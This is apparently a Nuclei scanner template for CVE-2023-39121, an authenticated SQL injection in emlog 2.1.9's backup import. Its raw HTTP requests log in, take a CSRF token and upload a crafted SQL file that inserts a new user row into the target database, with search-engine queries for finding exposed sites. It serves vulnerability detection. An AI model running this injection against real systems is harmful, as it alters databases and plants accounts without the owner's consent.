id: CVE-2023-39121

info:
  name: Emlog 2.1.9 - SQL Injection
  author: wjch611
  severity: high
  description: |
    emlog v2.1.9 contains a SQL injection caused by unsanitized input in the data backup/restore functionality, allowing attackers to execute arbitrary SQL commands through crafted backup files.
  impact: |
    Attackers with admin credentials can execute arbitrary SQL commands, potentially leading to privilege escalation, data leakage, modification, or deletion.
  remediation: |
    Update to the latest version of emlog or apply security patches addressing the SQL injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39121
    - https://github.com/safe-b/CVE/issues/1#issue-1817133689
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-39121
    cwe-id: CWE-89
    epss-score: 0.0268
    epss-percentile: 0.86113
    cpe: cpe:2.3:a:emlog:emlog:2.1.9:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: emlog
    product: emlog
    shodan-query: http.title:"emlog"
    fofa-query: title="emlog"
    google-query: intitle:"emlog"
  tags: cve2023,cve,sqli,emlog,authenticated

variables:
  rand_uid: "{{rand_int(10000, 99999)}}"
  rand_marker: "{{rand_int(100000, 999999)}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  - raw:
      - |
        POST /admin/account.php?action=dosignin&s= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pw={{password}}

  - raw:
      - |
        GET /admin/data.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - 'name="token" id="token" value="([a-f0-9]{40})"'
        internal: true

  - raw:
      - |
        POST /admin/data.php?action=backup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        token={{token}}

    extractors:
      - type: dsl
        dsl:
          - "body"
        name: full_response
        internal: true

  - raw:
      - |
        POST /admin/data.php?action=import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUBHhE8PS934oJ2MP

        ------WebKitFormBoundaryUBHhE8PS934oJ2MP
        Content-Disposition: form-data; name="token"

        {{token}}
        ------WebKitFormBoundaryUBHhE8PS934oJ2MP
        Content-Disposition: form-data; name="sqlfile"; filename="emlog_test.sql"
        Content-Type: application/octet-stream

        {{full_response}}
        INSERT INTO emlog_user VALUES('{{rand_uid}}','sqli{{rand_marker}}','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.','test','writer','n','','sqli{{rand_marker}}@test.com','','','0','1687261845','1687261845');
        ------WebKitFormBoundaryUBHhE8PS934oJ2MP--

  - raw:
      - |
        GET /admin/user.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body, concat("sqli", rand_marker))
# digest: 490a00463044022046e962e5fd1ba6ccc69951dc75beaf05518fbac07228980b5f69f15f11e2e41a0220049564ab3290bdef4ac949ecefc014cf38947298fa0e9335f399b5931ff5fb1a:922c64590222798bb761d5b6d8e72950